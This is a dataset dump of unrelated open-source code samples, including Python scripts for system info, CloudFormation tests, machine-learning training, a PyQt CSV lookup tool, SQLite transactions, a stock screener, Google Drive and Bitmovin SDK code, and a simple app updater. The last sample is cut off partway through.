+{"seq_id":"28744196","text":"#!/usr/bin/env python\n\"\"\"\ninfo about project here\n\"\"\"\n\nimport os\nimport time\n\n\n\n...\n\n__author__ = \"Johannes Coolen\"\n__email__ = \"johannes.coolen@student.kdg.be\"\n__status__ = \"development\"\n\n\ndef main():\n unumber = os.getuid()\n pnumber = os.getpid()\n where = os.getcwd()\n what = os.uname()\n used = os.times()\n now = time.time()\n means = time.ctime(now)\n\n print(\"User number\", unumber)\n print(\"Process ID\", pnumber)\n print(\"Current Directory\", where)\n print(\"System information\", what)\n print(\"System information\", used)\n\n\nif __name__ == '__main__': # code to execute if called from command-line\n main()\n","sub_path":"systeminfo.py","file_name":"systeminfo.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87918193","text":"\"\"\"\nTests for the from_file function of the Cloudvomation class.\n\"\"\"\n\nimport os\nimport unittest\n\nfrom cloudvomation import Cloudvomation\n\n\nclass FromFileTestCase(unittest.TestCase):\n \"\"\" Tests for the from_file function. 
\"\"\"\n\n @classmethod\n def setUpClass(cls):\n this_path = os.path.dirname(os.path.abspath(__file__))\n template_path = os.path.join(this_path,\n 'test_template.yaml')\n\n if not os.path.exists(template_path):\n raise Exception('{} does not exist.'.format(template_path))\n\n cls.cv = Cloudvomation.from_file(region='eu-west-2',\n stack_name='my-stack-name',\n template_filename=template_path)\n\n def test_region(self):\n \"\"\" Assert that the internal _region member is set. \"\"\"\n self.assertEqual(self.cv._region, # pylint: disable=protected-access\n 'eu-west-2')\n\n def test_stack_name(self):\n \"\"\" Assert that the internal _stack_name member is set. \"\"\"\n self.assertEqual(self.cv._stack_name, # pylint: disable=protected-access\n 'my-stack-name')\n\n def test_template_body(self):\n \"\"\" Assert that the internal _template_body member is set. \"\"\"\n expected = 'AWSTemplateFormatVersion: 2010-09-09\\nDescription: Test\\n'\n self.assertEqual(self.cv._template_body, # pylint: disable=protected-access\n expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cloudvomation/classes/test_cloudvomation/test_from_file.py","file_name":"test_from_file.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"410573667","text":"# parsing JSON from a file\n\nimport json\n\n# 1. Open the file\nwith open(\"code/Data/test.json\") as f:\n # 2. Parse JSON\n data = json.loads(f.read())\n\n# what is the fourth letter?\nprint(data[\"letters\"][3])\n\n# Output:\n# d\n","sub_path":"code/117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"111069728","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import LabelEncoder\nheader = ['Date', 'Location', 'MinTemp', 'MaxTemp', 'Rainfall', 'Evaporation', 'Sunshine', 'WindGustDir','WindGustSpeed',\n 'WindDir9am', 'WindDir3pm', 'WindSpeed9am', 'WindSpeed3pm', 'Humidity9am', 'Humidity3pm',\n 'Pressure9am', 'Pressure3pm', 'Cloud9am', 'Cloud3pm', 'Temp9am', 'Temp3pm',\n 'RainToday', 'RISK_MM', 'RainTomorrow']\ndef get_score(file_path):\n df=pd.read_csv(file_path, names=header)\n data=df.drop(['Evaporation','Sunshine'], axis=1)\n le=LabelEncoder()\n data['WindDir3pm']=le.fit_transform(data['WindDir3pm'].fillna('0'))\n data['RainToday']=le.fit_transform(data['RainToday'].fillna('0'))\n data['RainTomorrow']=le.fit_transform(data['RainTomorrow'].fillna('0'))\n data['Location']=le.fit_transform(data['Location'].fillna('0'))\n data['WindGustDir']=le.fit_transform(data['WindGustDir'].fillna('0'))\n data['WindDir9am']=le.fit_transform(data['WindDir9am'].fillna('0'))\n X=data.iloc[:,1:22].values\n X = np.nan_to_num(X)\n Y=data['RainTomorrow'].values\n Y = np.nan_to_num(Y)\n X_train,X_test,y_train,y_test=train_test_split(X,Y)\n classifier=LogisticRegression(solver='lbfgs')\n classifier.fit(X_train,y_train)\n result = classifier.score(X_test,y_test)\n return result\ndef format_results(results):\n f = open('output\\\\result.txt', 'w')\n for country in results:\n output_format = \"[\" + country + \"] : [\" + str(results[country]) + \"]\\n\"\n f.write(output_format)\n avg = sum(results.values())/len(results)\n f.write(\"average_accuracy: [\" + str(avg) + \"]\")\n f.close()\nif 
__name__ == \"__main__\":\n path = \"data\"\n files = os.listdir(path)\n d = {}\n for file_ in files:\n file_path = os.path.join(path, file_)\n country = file_.split(\"_\")[-1][:-4]\n d[country] = get_score(file_path)\n print(\"Accuracy of {} is {}\".format(country, d[country]))\n format_results(d)\n","sub_path":"Task2/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319605603","text":"from __future__ import print_function\nimport os\nimport neat\nimport visualize\nimport gym\nimport numpy as np\nfrom gym import wrappers\nimport pickle\n\nMAX_STEPS = 500\ncount = 0\nreward_list = []\n#env = wrappers.Monitor(env, '/mnt/c/Users/bc/Documents/EA/neat/cartpole/movies', video_callable=(lambda ep: ep % 150 == 0), force=True)\ndef eval_genomes(genomes, config):\n global env\n global MAX_STEPS\n global count\n env = gym.make(\"BipedalWalker-v2\")\n max_episode_fitness = -500\n for genome_id, genome in genomes:\n genome.fitness = 0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n observation = env.reset()\n episode_reward = 0\n for _ in range(5):\n while True:\n action = net.activate(observation)\n #print(\"observation\",observation)\n #print(\"action\",action)\n action = np.clip(action,-1,1)\n #env.render()\n observation,reward,done,info = env.step(action)\n episode_reward += reward\n #if (-4.8 > observation[0]) or (observation[0] > 4.8) or (0.017453292519943 < observation[3] < -0.017453292519943) or (episode_reward >= MAX_STEPS):\n if done:\n #print(episode_reward)\n env.reset()\n break\n #print(episode_reward)\n genome.fitness = episode_reward / 5\n if max_episode_fitness <= episode_reward / 5 :\n max_episode_fitness = episode_reward / 5 \n winner = genome\n #print(max_episode_fitness)\n reward_list.append(episode_reward / 5)\n if count % 10 == 0:\n winner_net = neat.nn.FeedForwardNetwork.create(genome, config)\n #env = wrappers.Monitor(env, '/home/bc/Documents/EA/experiment/Bipedalwalker/neat/movies', force=True)\n #observation = env.reset()\n #for i in range(500):\n #action = winner_net.activate(observation)\n #env.render()\n #action = np.clip(action,-1,1)\n #observation,reward,done,info = env.step(action)\n #episode_reward += reward\n #if (-4.8 > observation[0]) or (observation[0] > 4.8) or (0.017453292519943 < observation[3] < -0.017453292519943) or (episode_reward >= MAX_STEPS):\n #if done:\n #observation = env.reset()\n #break\n\n for n, g in enumerate([winner]):\n name = '2winner-{0}'.format(n)\n with open(name+'.pickle', 'wb') as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, filename=str(count)+name + \"-net.gv\")\n visualize.draw_net(config, g, view=False, filename=str(count)+\"2net-enabled.gv\",show_disabled=False)\n count +=1\n\ndef run(config_file):\n global env\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n #p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-9')\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(10))\n reward_list = []\n #for j in range(20):\n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 300)\n 
print(reward_list)\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n\n visualize.draw_net(config, winner, True)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n visualize.draw_net(config,winner,view=True,filename=\"winner-feedforward-evabled-pruneg.gv\",show_disabled=False,prune_unused=True)\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n final_reward = 0\n #env = wrappers.Monitor(env, '/mnt/c/Users/bc/Documents/EA/neat/BipedalWalker/movies', force=True)\n observation = env.reset()\n while True:\n action = winner_net.activate(observation)\n action = np.clip(action,-1,1)\n observation,reward,done,info = env.step(action)\n final_reward += reward\n if done:\n print(\"final_reward :\",final_reward)\n break\n #winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n for n, g in enumerate([winner]):\n visualize.draw_net(config, g, view=False, filename=str(j)+\"-net-enabled-pruned.gv\",show_disabled=False, prune_unused=True)\n #p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n #p.run(eval_genomes, 10)\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-Feedforward')\n run(config_path)\n","sub_path":"experiment/Bipedalwalker/neat/temp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133532796","text":"#coding=utf-8\n\n\n#解释算法的复杂度\n#仅需要遍历一次链表,算法的复杂度为O(n)\n#去掉末尾\ndef combine(a, b):\n if a is None:\n return b\n if b is None:\n return a\n listA = list(a)\n listB = list(b)\n while len(listA)>0 and len(listB)>0:\n if listA[len(listA)-1] == listB[0]:\n listA.pop(len(listA)-1)\n listB.pop(0)\n else:\n break\n listA.extend(listB) #合并list\n return \"\".join(listA)\n\nif __name__==\"__main__\":\n print(combine(\"abcdef\", \"fedha\"))\n","sub_path":"naturali/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"177386012","text":"import csv\r\nimport logging\r\n\r\nfrom PyQt4 import QtGui, QtCore\r\n\r\nfrom functions import lookup_hts, lookup_model, log_debug_data, send_email\r\nfrom models import LookupModel\r\n\r\nlogging.basicConfig(filename='basic.log', level=logging.WARNING)\r\n\r\n\r\nclass OpenFile(QtGui.QWidget):\r\n def __init__(self, parent=None):\r\n super(OpenFile, self).__init__()\r\n self.layout = QtGui.QGridLayout()\r\n self.setLayout(self.layout)\r\n self.textEdit = QtGui.QTextEdit()\r\n self.textEdit.setReadOnly(True)\r\n self.layout.addWidget(self.textEdit, 1, 0, 3, 4)\r\n self.button_open = QtGui.QPushButton(\"Open File\")\r\n self.button_start = QtGui.QPushButton(\"Run Query\")\r\n self.button_save = QtGui.QPushButton(\"Save File\")\r\n self.button_open.clicked.connect(self.open_file)\r\n self.button_start.clicked.connect(self.on_start)\r\n self.button_save.clicked.connect(self.save_file)\r\n self.layout.addWidget(self.button_open, 4, 0, 1, 1)\r\n self.layout.addWidget(self.button_start, 4, 1, 1, 1)\r\n self.layout.addWidget(self.button_save, 4, 3, 1, 1)\r\n self.progress = QtGui.QProgressBar()\r\n 
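# A (0, 1) range draws an idle determinate bar; on_start() switches to\r\n        # setRange(0, 0), Qt's indeterminate \"busy\" animation, and on_finished()\r\n        # restores the (0, 1) range once the worker thread completes.\r\n        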
self.progress.setRange(0, 1)\r\n        self.layout.addWidget(self.progress, 5, 0, 1, 4)\r\n        self.file_name = None\r\n        self.output = []\r\n\r\n    def open_file(self):\r\n        try:\r\n            self.file_name = QtGui.QFileDialog.getOpenFileName(self, 'Open file', '/home', '*.csv')\r\n        # PermissionError subclasses OSError, so it must be caught first.\r\n        except PermissionError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"Please close the file first.\")\r\n            log_debug_data('OpenFile', 'open_file', err)\r\n        except OSError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"No file was chosen\")\r\n            log_debug_data('OpenFile', 'open_file', err)\r\n        except UnicodeDecodeError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"File not supported\")\r\n            log_debug_data('OpenFile', 'open_file', err)\r\n            send_email(err)\r\n        else:\r\n            with open(self.file_name, 'r', newline='', encoding='utf8', errors=\"ignore\") as f:\r\n                data = f.read()\r\n                self.textEdit.setText(data)\r\n\r\n    def on_start(self):\r\n        self.progress.setRange(0, 0)\r\n        self.task = OpenFileThread(self.file_name)\r\n        self.connect(self.task, QtCore.SIGNAL('on_finished(PyQt_PyObject)'), self.on_finished)\r\n        self.connect(self.task, QtCore.SIGNAL('finished()'), self.done)\r\n        self.task.start()\r\n\r\n    def on_finished(self, output):\r\n        self.output = output\r\n        self.textEdit.setPlainText(str(self.output))\r\n        self.progress.setRange(0, 1)\r\n        self.progress.setValue(1)\r\n\r\n    def save_file(self):\r\n        print(\"Save file\")\r\n        try:\r\n            file = QtGui.QFileDialog.getSaveFileName(self, \"saveFile\", \"Result.csv\", filter=\"csv (*.csv *.)\")\r\n        except UnicodeDecodeError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"Decoding Error.\")\r\n            log_debug_data('OpenFile', 'save_file', err)\r\n            send_email(err)\r\n        # PermissionError subclasses OSError, so it must be caught first.\r\n        except PermissionError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"Please close the file first.\")\r\n            log_debug_data('OpenFile', 'save_file', err)\r\n        except OSError as err:\r\n            QtGui.QMessageBox.information(self, \"Information\", \"Please select a file to save.\")\r\n            log_debug_data('OpenFile', 'save_file', err)\r\n        else:\r\n            with open(file, 'w', newline='', encoding='utf8', errors=\"ignore\") as f:\r\n                writer = csv.writer(f, delimiter=\";\")\r\n                writer.writerows(self.output)\r\n\r\n    def done(self):\r\n        QtGui.QMessageBox.information(self, \"Done!\", \"Database searched!\")\r\n\r\n\r\nclass OpenFileThread(QtCore.QThread):\r\n    def __init__(self, file: object) -> object:\r\n        QtCore.QThread.__init__(self)\r\n        self.file_name = file\r\n        self.output = []\r\n\r\n    def run_file(self):\r\n        try:\r\n            with open(self.file_name, encoding='utf8', errors='ignore') as f:\r\n                fieldnames = ['SAP code', 'INVOICE #', 'SUPPLIER NAME', 'CoD', 'PART#', 'PART DESC', 'HTS #']\r\n                reader = csv.DictReader(f, fieldnames=fieldnames, delimiter=';')\r\n                for row in reader:\r\n                    if LookupModel.select().where(LookupModel.suplier_name == row['SUPPLIER NAME'].upper(),\r\n                                                  LookupModel.hts == lookup_hts(row['PART DESC'])).exists():\r\n                        self.output.append([row['SUPPLIER NAME'].upper(), row['PART DESC'],\r\n                                            lookup_model(row['PART DESC'].upper()),\r\n                                            lookup_hts(row['PART DESC'].upper())])\r\n\r\n                    else:\r\n                        self.output.append([row['SUPPLIER NAME'], row['PART DESC'], \"No Match Found\"])\r\n\r\n        except UnicodeDecodeError as err:\r\n            self.output = \"Decoding Error\"\r\n            log_debug_data('OpenFileThread', 'run_file', err)\r\n            send_email(err)\r\n\r\n    def run(self):\r\n        self.run_file()\r\n        self.emit(QtCore.SIGNAL('on_finished(PyQt_PyObject)'), 
self.output)\r\n","sub_path":"interface_001.py","file_name":"interface_001.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530058157","text":"import sqlite3\n\n''' Управление транзакциями '''\n\ndb_filename = 'database.db'\n\ndef display_table(conn):\n cursor = conn.cursor()\n cursor.execute('select name, size, date from images;')\n for name, size, date in cursor.fetchall():\n print(name, size, date)\n\n\nwith sqlite3.connect(db_filename) as conn1:\n print('Before changes:')\n display_table(conn1)\n\n cursor1 = conn1.cursor()\n cursor1.execute(\"\"\"\ninsert into images (name, size, date) values ('JournalDev.png', 2000, '2020-02-20'); \"\"\"\n )\n print('\\nAfter changes in conn1:')\n display_table(conn1)\n\n print('\\nBefore commit:')\n with sqlite3.connect(db_filename) as conn2:\n display_table(conn2)\n\n # Commit from the first connection\n conn1.commit()\n print('\\nAfter commit:')\n with sqlite3.connect(db_filename) as conn3:\n display_table(conn3)\n\n cursor1.execute(\n \"\"\" insert into images (name, size, date) values ('Hello.png', 200, '2020-01-18'); \"\"\"\n )\n print('\\nBefore commit:')\n with sqlite3.connect(db_filename) as conn2:\n display_table(conn2)\n\n # Revert to changes before conn1's commit\n conn1.rollback()\n print('\\nAfter connection 1 rollback:')\n with sqlite3.connect(db_filename) as conn4:\n display_table(conn4)\n\n\n'''удаление для реализации повторного запуска (добавления данных)'''\n\nwith sqlite3.connect(db_filename) as conn5:\n cursor5 = conn5.cursor()\n cursor5.execute(\"\"\"delete from images where name='JournalDev.png'; \"\"\" )\n conn5.commit()\n print('\\nAfter delete in conn5:')\n display_table(conn5)\n\n","sub_path":"Demo-itmo/mod_BD/SQLite_demo/demo02/sqlite_02tran.py","file_name":"sqlite_02tran.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407203565","text":"import pandas as pd\nimport pandas_datareader as web\nfrom pandas_datareader import data\nimport math\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom datetime import datetime, timedelta\nfrom condition import *\nfrom finviz.screener import Screener\n\n# Stage 2 uptrend condition:\n# 1,2,4,5: current price > 50-day > 150-day MA > 200-day MA\n# 6,7: current price > 1.3*52weeklow and 0.75*52weekhigh < current price < 1.25*52weekhigh\n# 3: 200-day MA line is trending up for 4-5 months\ndef stock_screen(scanDate):\n\n price_list = []\n bought_date = []\n stocks_worth_buying = []\n futu_list = []\n stocks_error = []\n count_good = 0\n count_bad = 0\n count_error = 0\n\n filters = ['sh_curvol_o200', 'sh_price_o10', 'ta_highlow52w_a30h', 'ta_sma200_sa50', 'ta_sma50_pa']\n stock_list = Screener(filters=filters, table='Performance')\n symbols = []\n for stock in stock_list:\n symbols.append(stock['Ticker'])\n\n todayDate = scanDate\n endDate = todayDate - timedelta(days = 1)\n startDate = endDate - timedelta(days = 365)\n print('Scan date: ',endDate.strftime('%Y-%m-%d'))\n\n for i in range(len(symbols)):\n try:\n df = web.DataReader(symbols[i], 'yahoo', startDate.strftime('%Y-%m-%d'), endDate.strftime('%Y-%m-%d'))\n \n # get data\n df['MovingAverage200'] = df['Close'].rolling(window=200).mean()\n ma200_increasing = df['MovingAverage200'].tolist()\n current_price = float(df['Close'][-1])\n ma50 = MA(df,50,'Close')[-1]\n ma150 = MA(df,150,'Close')[-1]\n ma200 = 
MA(df,200,'Close')[-1]\n low52week=LLV(df,252)\n high52week=HHV(df,252)\n MACD_line, MACD_Signal_line = calculate_macd(df, 'Close', 26, 12, 9)\n\n print(f'Stock: {symbols[i]}')\n print(f'Current price: {current_price}')\n print(f'ma50: {ma50}')\n print(f'ma150: {ma150}')\n print(f'ma200: {ma200}')\n print(f'low52week: {low52week}')\n print(f'high52week: {high52week}')\n\n if condition_1245(current_price,ma50,ma150,ma200) and condition_67(current_price,low52week,high52week) and condition_3(ma200_increasing) and vol_range(df) and VCP_Detection(df,current_price):\n\n print('Good')\n count_good=count_good+1\n stocks_worth_buying.append(symbols[i])\n futu_list.append('31#' + symbols[i])\n bought_date.append(scanDate)\n price_list.append(current_price)\n \n else:\n print('Bad')\n count_bad=count_bad+1\n\n except:\n print(f'Stock: {symbols[i]}')\n print(\"Something's wrong\")\n count_error=count_error+1\n stocks_error.append(symbols[i])\n\n\n futuexport = pd.DataFrame(futu_list)\n filepath = 'output\\Stocks worth buying_{}_{}.csv'.format(cap,endDate.strftime('%Y-%m-%d'))\n futuexport.to_csv(filepath, index = False)\n print(stocks_worth_buying)\n print(f'Scanning of {scanDate} is complete')\n return stocks_worth_buying","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284656604","text":"\"\"\"\nThis example reads the content of a directory and writes the files from the\ndirectory to the console.\n\"\"\"\n\nimport gdrive_tools.gdrive_tools as gt\nimport gdrive_tools.google_auth as ga\nfrom gdrive_tools.google_filetypes import GoogleFiletypes\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/documents', 'https://www.googleapis.com/auth/drive']\n\ndef main():\n\n # Create the google auth wrapper, which wraps the authentication\n # process. 
You only need to specify the needed scopes here.\n auth = ga.GoogleAuth(SCOPES)\n\n # Obtain the credentials, after the authentication process finished.\n creds = auth.createCredentials()\n\n # Create the google drive tools client with your local credentials.\n googleDriveTools = gt.GDriveTools(creds)\n\n # For the demonstation of the readDirectory() method, we want to\n # create a file called 'sample' in the 'simple/test' directory on our\n # local drive first.\n destinationPath = 'simple/test'\n docname = 'sample'\n googleDriveTools.createFile(destinationPath, docname, GoogleFiletypes.DOCUMENT)\n\n # Now we want to read the content of the 'simple/test' directory.\n directoryContent = googleDriveTools.readDirectory(destinationPath)\n\n print(f\"The directory has the following ID: {directoryContent['directory_id']}\")\n print(\"The following files are currently stored inside the directory:\\n\")\n for currentFile in directoryContent['files']:\n print(f\"Filename:\\t{currentFile['name']}\")\n print(f\"File Id:\\t{currentFile['id']}\")\n print(f\"Mime Type:\\t{currentFile['type']}\\n\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/read_directory.py","file_name":"read_directory.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280691560","text":"# coding: utf-8\n\nfrom enum import Enum\nfrom datetime import date\nfrom six import string_types, iteritems\nfrom bitmovin_api_sdk.common.poscheck import poscheck_model\nimport pprint\nimport six\n\n\nclass EncodingStatistics(object):\n @poscheck_model\n def __init__(self,\n date_=None,\n bytes_encoded=None,\n time_encoded=None,\n bytes_egress=None):\n # type: (date, int, int, int) -> None\n\n self._date = None\n self._bytes_encoded = None\n self._time_encoded = None\n self._bytes_egress = None\n self.discriminator = None\n\n if date_ is not None:\n self.date = date_\n if bytes_encoded is not None:\n self.bytes_encoded = bytes_encoded\n if time_encoded is not None:\n self.time_encoded = time_encoded\n if bytes_egress is not None:\n self.bytes_egress = bytes_egress\n\n @property\n def openapi_types(self):\n types = {\n 'date': 'date',\n 'bytes_encoded': 'int',\n 'time_encoded': 'int',\n 'bytes_egress': 'int'\n }\n\n return types\n\n @property\n def attribute_map(self):\n attributes = {\n 'date': 'date',\n 'bytes_encoded': 'bytesEncoded',\n 'time_encoded': 'timeEncoded',\n 'bytes_egress': 'bytesEgress'\n }\n return attributes\n\n @property\n def date(self):\n # type: () -> date\n \"\"\"Gets the date of this EncodingStatistics.\n\n Date, format. yyyy-MM-dd (required)\n\n :return: The date of this EncodingStatistics.\n :rtype: date\n \"\"\"\n return self._date\n\n @date.setter\n def date(self, date_):\n # type: (date) -> None\n \"\"\"Sets the date of this EncodingStatistics.\n\n Date, format. yyyy-MM-dd (required)\n\n :param date_: The date of this EncodingStatistics.\n :type: date\n \"\"\"\n\n if date_ is not None:\n if not isinstance(date_, date):\n raise TypeError(\"Invalid type for `date`, type has to be `date`\")\n\n self._date = date_\n\n @property\n def bytes_encoded(self):\n # type: () -> int\n \"\"\"Gets the bytes_encoded of this EncodingStatistics.\n\n Bytes encoded for this encoding. 
(required)\n\n :return: The bytes_encoded of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._bytes_encoded\n\n @bytes_encoded.setter\n def bytes_encoded(self, bytes_encoded):\n # type: (int) -> None\n \"\"\"Sets the bytes_encoded of this EncodingStatistics.\n\n Bytes encoded for this encoding. (required)\n\n :param bytes_encoded: The bytes_encoded of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if bytes_encoded is not None:\n if not isinstance(bytes_encoded, int):\n raise TypeError(\"Invalid type for `bytes_encoded`, type has to be `int`\")\n\n self._bytes_encoded = bytes_encoded\n\n @property\n def time_encoded(self):\n # type: () -> int\n \"\"\"Gets the time_encoded of this EncodingStatistics.\n\n Time in seconds encoded for this encoding. (required)\n\n :return: The time_encoded of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._time_encoded\n\n @time_encoded.setter\n def time_encoded(self, time_encoded):\n # type: (int) -> None\n \"\"\"Sets the time_encoded of this EncodingStatistics.\n\n Time in seconds encoded for this encoding. (required)\n\n :param time_encoded: The time_encoded of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if time_encoded is not None:\n if not isinstance(time_encoded, int):\n raise TypeError(\"Invalid type for `time_encoded`, type has to be `int`\")\n\n self._time_encoded = time_encoded\n\n @property\n def bytes_egress(self):\n # type: () -> int\n \"\"\"Gets the bytes_egress of this EncodingStatistics.\n\n Egress output generated by file transfers in bytes (required)\n\n :return: The bytes_egress of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._bytes_egress\n\n @bytes_egress.setter\n def bytes_egress(self, bytes_egress):\n # type: (int) -> None\n \"\"\"Sets the bytes_egress of this EncodingStatistics.\n\n Egress output generated by file transfers in bytes (required)\n\n :param bytes_egress: The bytes_egress of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if bytes_egress is not None:\n if not isinstance(bytes_egress, int):\n raise TypeError(\"Invalid type for `bytes_egress`, type has to be `int`\")\n\n self._bytes_egress = bytes_egress\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if value is None:\n continue\n if isinstance(value, list):\n if len(value) == 0:\n continue\n result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, \"to_dict\") else x for x in value]]\n elif hasattr(value, \"to_dict\"):\n result[self.attribute_map.get(attr)] = value.to_dict()\n elif isinstance(value, Enum):\n result[self.attribute_map.get(attr)] = value.value\n elif isinstance(value, dict):\n result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, \"to_dict\") else v) for (k, v) in value.items()}\n else:\n result[self.attribute_map.get(attr)] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, EncodingStatistics):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == 
other\n","sub_path":"bitmovin_api_sdk/models/encoding_statistics.py","file_name":"encoding_statistics.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284929767","text":"import urllib3\nimport zipfile\nimport os\nimport shutil\n\nhttp = urllib3.PoolManager()\n\nclass Updater(object):\n def __init__(self, host, urlVersion, urlZip):\n self.host = host #e.g. http://localhost\n self.urlVersion = urlVersion #e.g. /version.txt\n self.urlZip = urlZip #e.g. /latest.zip\n\n def check(self, currentVersion, clear=False, clearPath=''): #If the is a newer version, it returns True, otherwise False. Also returns False when error occured.\n try:\n if clear:\n for el in os.listdir(clearPath):\n if el is not str(currentVersion):\n fullpath = os.path.join(clearPath, el)\n if os.path.isdir(fullpath):\n shutil.rmtree(fullpath)\n else:\n os.remove(fullpath)\n\n self.latestVersion = float(http.request('GET', self.host + self.urlVersion)._body)\n if self.latestVersion > currentVersion:\n return True\n else:\n return False\n except:\n raise\n\n\n def download(self, path): #Returns True if downloaded, else returns False.\n try:\n with open(path, 'wb') as f:\n f.write(http.request('GET', self.urlZip).data)\n return True\n except:\n return False\n\n\n def install(self, path, zipPath, remove=True): #Returns True if instaled successfully. Returns False when error occured.\n try:\n zip = zipfile.ZipFile(zipPath, 'r')\n zip.extractall(os.path.join(path, str(self.latestVersion)))\n zip.close()\n\n if remove is True:\n os.remove(zipPath)\n\n return os.path.join(path, str(self.latestVersion))\n except:\n raise\n\n def run(self, exePath, exit=True): #Returns False if error occured. Else returns True.\n try:\n os.startfile(exePath)\n if exit is True:\n quit()\n return True\n except Exception:\n return False\n\nif __name__ == \"__main__\":\n updater = Updater('localhost', '/version.txt', '/latest.zip')\n print(updater.check(0.1, 1, 'temp', 0.2))\n print(updater.download('new.zip'))\n path = updater.install('temp', 'new.zip')\n print(path)\n print(updater.run(os.path.join(path, 'hello.exe')))\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182468178","text":"import ROOT\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection \nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nfrom TreeProducerMuEle import *\n\n\nclass declareVariables(TreeProducerMuEle):\n \n def __init__(self, name):\n\n super(declareVariables, self).__init__(name)\n\n\nclass MuEleProducer(Module):\n\n def __init__(self, name, DataType):\n\n self.name = name\n self.out = declareVariables(name)\n\n if DataType=='data':\n self.isData = True\n else:\n self.isData = False\n\n self.Nocut = 0\n self.Trigger = 1\n self.GoodMuons = 2\n self.GoodElectrons = 3\n self.GoodDiLepton = 4\n self.TotalWeighted = 15\n\n def beginJob(self):\n pass\n\n def endJob(self):\n self.out.outputfile.Write()\n self.out.outputfile.Close()\n# pass\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree): \n pass\n \n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n\n# electrons = Collection(event, 
